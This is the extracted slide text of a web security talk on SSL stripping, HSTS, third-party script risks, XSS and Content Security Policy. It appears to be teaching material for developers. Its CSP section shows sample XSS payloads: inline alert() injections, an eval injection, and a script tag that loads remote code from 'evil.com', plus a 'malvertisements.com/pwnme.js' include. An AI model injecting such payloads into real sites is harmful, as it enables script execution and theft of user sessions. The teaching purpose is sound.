Why Traditional Web Security Technologies no Longer Suffice to Keep You SafePhilippe De Ryck

@PhilippeDeRyck https://www.websec.be

Which Scenario Would You Trust?

(a)Visit website, browse public pages

Login with username and password

Consult private information

Visit website, browse public pages

Login with username and password

Consult private information

Visit website, browse public pages

Login with username and password

Consult private information

(b)

(c)

About Me – Philippe De Ryck

3

§ Postdoctoral Researcher @ DistriNet (KU Leuven)§ PhD on client-side Web security§ Expert in the broad field of Web security§ Main author of the Primer on Client-Side Web Security

§ Running the Web Security training program§ Dissemination of knowledge and research results§ Public training courses and targeted in-house training§ Target audiences include industry and researchers

§ Part of the organizing committee of SecAppDev.org§ Week-long course focused on practical security

https://www.websec.be@PhilippeDeRyck

The Web Used to Be Server-Centric

5

With a lot of Server-Side Problems

6http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/

With a lot of Server-Side Problems

7http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids

8

9

10

The Web has Become Client-Centric

11

The Network Can no Longer Be Trusted

12

Networks Are Everywhere

13

§ We happily connect to any wifi network we can find§ Without knowing who has control over the network

§ Upstream networks are easily intercepted nowadays§ Intercepting proxies at the network perimeter§ ISPs inspecting and manipulating traffic§ State agencies tapping the backbone

The Communication Channel Is Insecure

14

§ People are mainly concerned about eavesdropping attacks§ Sniffing usernames, passwords, session identifiers, …§ Demonstrated in 2010 by the Firesheep add-on

http://codebutler.com/firesheep/

The Communication Channel Is Insecure

15

§ People are mainly concerned about eavesdropping attacks§ Sniffing usernames, passwords, session identifiers, …§ Demonstrated in 2010 by the Firesheep add-on§ Generally prevented by using HTTPS for sensitive data

§ But today, active network attacks are just as easy to execute§ Man on the side attacks inject traffic into the network§ Man in the middle attacks intercept and manipulate traffic

§ Simply using HTTPS for sensitive data no longer suffices

Care to Reconsider your Previous Answer?

(a)Visit website, browse public pages

Login with username and password

Consult private information

Visit website, browse public pages

Login with username and password

Consult private information

Visit website, browse public pages

Login with username and password

Consult private information

(b)

(c)

Averting the Use of HTTPS

17

Stripping HTTPS from Login Forms

18

some-shop.com

Visit http://some-shop.com

Welcome, please log in

Login as Philippe

Welcome Philippe

Visit http://some-shop.com

Welcome, please log in

Login as Philippe

Welcome Philippe

Rewrite HTTPS

to HTTP

HTTPS Prevents Man in the Middle Attacks

19

some-shop.com

Visit https://some-shop.com

Welcome, please log in

Login as Philippe

Welcome Philippe

Visit https://some-shop.com

Welcome, please log in

Login as Philippe

Welcome Philippe

HTTPS Prevents Man in the Middle Attacks?

20http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html

Bootstrapping the HTTPS Site

21

GET http://some-shop.com

200 OK

Response page

POST http://some-shop.com

GET http://…

301 Moved

GET https://…

200 OK

Rewrite HTTPS URLs

User: philippe & pass: pazzw0rdPOST https://…

some-shop.com

SSL Stripping Is a Sneaky Attack

22

HTTP Strict Transport Security (HSTS)

23

§ Instruct the browser to only visit a site over HTTPS§ Once-enabled no HTTP requests will be sent anymore§ Prevents SSL stripping attacks§ Prevents cookie stealing over HTTP

GET https://websec.be

websec.be

200 OK

Response page

HTTP Strict Transport Security (HSTS)

24

§ HSTS is a server-driven browser-enforced security policy§ Server sends the Strict-Transport-Security response header

§ The protection is only applied for the duration of max-age§ Make sure this value covers non-frequent visitors§ The value 0 disables the HSTS policy for this particular host

• Only if received over an error-free channel

Strict-Transport-Security: max-age=31536000; includeSubdomains

4 4 7 11From version … 4.4.4 7.1

HSTS in Action

25

GET https://websec.be

websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

GET https://websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

www.websec.beGET https://www.websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

The Bootstrapping Problem … Again

26

GET https://websec.be

websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

GET https://websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

www.websec.beGET https://www.websec.be

200 OK

Response pageStrict-Transport-Security: max-age=31536000;

includeSubdomains

Preloading HSTS

27

§ The bootstrapping problem is solved by a preloaded list§ Contains all sites that have explicitly subscribed to HSTS§ Distributed along with the browsers§ Available on https://hstspreload.appspot.com/

HTTPS Should Be Enabled by Default

28

§ Browser vendors are strongly pushing towards HTTPS§ Firefox marks HTTP pages with password fields as insecure§ Google uses HTTPS as a ranking signal in its search engine§ Active mixed content is blocked in modern browsers

§ Chrome and Firefox will support Secure Contexts§ A Secure Context is delivered over HTTPS, including its parents§ Powerful features will only be exposed to a Secure Context

• E.g. Geolocation, microphone and camera access, …

Hardening your HTTPS Deployment

29

§ Finetune the supported protocols and ciphers§ Disable the old and obsolete SSLv2 and SSLv3§ Avoid the use of old and weak ciphers

§ Move all your traffic to HTTPS§ Immediately redirect all HTTP traffic to HTTPS§ Prevent SSL Stripping by enabling Strict Transport Security (HSTS)

§ If you want to go all out, enable Public Key Pinning (HPKP)§ Prevents impersonation attacks with rogue but valid certificates

https://www.ssllabs.com/ssltest/

Insecure Third-Party Content Can Be Disastrous

30

Browsers Do More than Rendering HTML

31

§ Modern browsers are full-fledged application platforms§ Plenty of system features are exposed to Web applications

• Battery status, Vibration, Geolocation, Microphone & Camera, …§ ChromeOS and FirefoxOS run all applications inside a browser

§ The key enabler for all of this functionality is JavaScript§ Since its introduction in 1995, JS has finally taken over the Web§ Plugins like Flash and Silverlight are slowly fading away

§ So, how about security?§ We have the same-origin policy, but it’s 20 years old …

The Same-Origin Policy

32

http://example.com

http://example.comhttp://example.com

http://private.example.com

http://forum.example.com

http://private.example.com

SAME-ORIGIN POLICYContent retrieved from one origin can freely interact with other content from that origin, but interactions with content from other origins are restricted

ORIGINThe triple <scheme, host, port> derived from the document’s URL. For http://example.org/forum/, the origin is <http, example.org, 80>

Origins, Frames and Scripts

33

§ The browser enforces origin-based separation§ Frames have a context, a document URL and an associated context§ Scripts are loaded into the context of the including page

§ Classical trade-off between isolation and flexibility

http://example.com

http://malvertisements.com

http://example.com

Script code from http://malvertisements.com

<iframe src=“http://malvertisements.com/pwnme.html” >

<script src=“http://malvertisements.com/pwnme.js” >

The Same-Origin Policy in Practice

34

§ Most content integration is script-based§ Included directly into the application’s context§ Which makes sense for libraries, such as JQuery§ But not for standalone third-party components

§ Every included script is a security risk§ Because it has full access to your context§ So you have to trust the supplier§ And the security of their systems

https://medium.com/@FredericJacobs/the-reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b

Responsibly Including Third-Party Content

36

§ Isolate the content in a context with a different origin§ Let the Same-Origin Policy protect you§ Enable interaction by exchanging messages between contexts

§ Further restrict isolated context using the HTML5 Sandbox§ Allows you to disable certain features in a framed context§ Allows you to place your own content in a unique origin

§ Verify the integrity of content loaded from a CDN§ Enabled by the brand new Subresource Integrity specification§ Prevents malware distribution by compromising a CDN

https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/

With XSS, the Attacker Includes the Code for You

37

Add review

Thanks for the review!

reviews

I can really recommend product X. It is awesome!<script>alert(‘Never gonna let you down!’)</script>

Show Reviews

Reviews page

<html><body>… …</body></html>

38http://blog.detectify.com/post/39209711597/how-i-got-a-3500-usd-facebook-bug-bounty

39http://www.zdnet.com/article/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen/

Traditional XSS Defenses

40

§ The server compiles data and code into a single HTML page§ XSS causes the browser to mistake data for code§ The proper defense is context-sensitive output encoding

§ Encode for the context where the data will be used§ HTML body <h1>DATA</h1>§ HTML attributes <div id=‘DATA’>§ Stylesheet context body { background-color: DATA;}§ Script context alert(“DATA”);§ URL context <a href=“http://…?arg=DATA”>

Content Security Policy against XSS

41

<h1>You searched for<script>alert(‘XSS’);</script></h1>

XSS WITH INLINE SCRIPTS

<h1>You searched for<script src=“https://evil.com/hackme.js”></script></h1>

XSS WITH REMOTE SCRIPTS

eval('alert("Your query string was ' + unescape(document.location.search) //hello%22);alert(1+%22 + '");');

XSS WITH EVAL

The Essence of CSP

42

§ CSP reduces the harm of content injection vulnerabilities§ By telling the client where resources should be loaded from§ By disabling “dangerous features” by default§ CSP is intended as a second line of defense

§ CSP will become more important in the future§ Supporting CSP in your application may be non-trivial§ Use of inline script blocks is disallowed§ Use of eval is disallowed

Introducing CSP by Example

43

Content-Security-Policy:default-src 'self';script-src ‘self’

https://cdnjs.cloudflare.com;style-src ‘self’

https://cdnjs.cloudflare.com/…/bootstrap.min.css;

EXAMPLE POLICY

§ A policy consists of a set of directives§ Each directive controls a different kind of resource§ Policy is delivered as an HTTP header by the server

• Alternatively, the meta tag can also be used§ Compatible browsers will enforce the policy on the response

CSP is the Security Policy of the Future

44

§ CSP has been well received, and evolved quickly§ Addition of plugin types, sandbox, child contexts, form destinations§ Re-enabling inline script with support for nonces and hashes§ Deprecates X-FRAME-OPTIONS header§ Supports blocking of mixed content / upgrading insecure requests

§ CSP level 1 is widely supported by browsers§ Support for level 2 is less widespread, but improving rapidly

§ Chrome makes CSP mandatory for its components§ Browser extensions and packaged apps

CSP Violation Reports

45

§ CSP can report violations back to the resource server§ Allows for fine-tuning of the CSP policy§ Gives insights in actual attacks

§ Enabled by using the report-uri directive§ Points to a handler on the server that can process reports

Content-Security-Policy:default-src 'self'; report-uri http://some-shop.com/csp-report.cgi

EXAMPLE POLICY

The Web has Become Client-Centric

46

Progressive Web Security

47

§ Take a progressive stance towards Web security§ The Web has become client-centric, and so has Web security§ Fully protecting your applications requires the latest technologies

§ All of these security technologies require explicit action§ Training is essential to keep up to date with the latest technologies

§ Share your experiences, help others advance as well§ Set an example on how to do it right

48

I hope you learned something tonight …Now it’s up to you

Grab a copy of the slides and share with anyone you can find

Read my blog or follow me on Twitter to stay informed about web security

Level up with Web security training!

All information on https://www.websec.be

Why Traditional Web Security Technologies no Longer Suffice to Keep You SafeAcknowledgements

Icons by Visual Pharm (https://icons8.com)

Images by Unsplash (https://unsplash.com/)

Why Traditional Web Security Technologies no Longer Suffice to Keep You SafePhilippe De Ryck

philippe.deryck@cs.kuleuven.be

/in/philippederyck

https://www.websec.be

@PhilippeDeRyck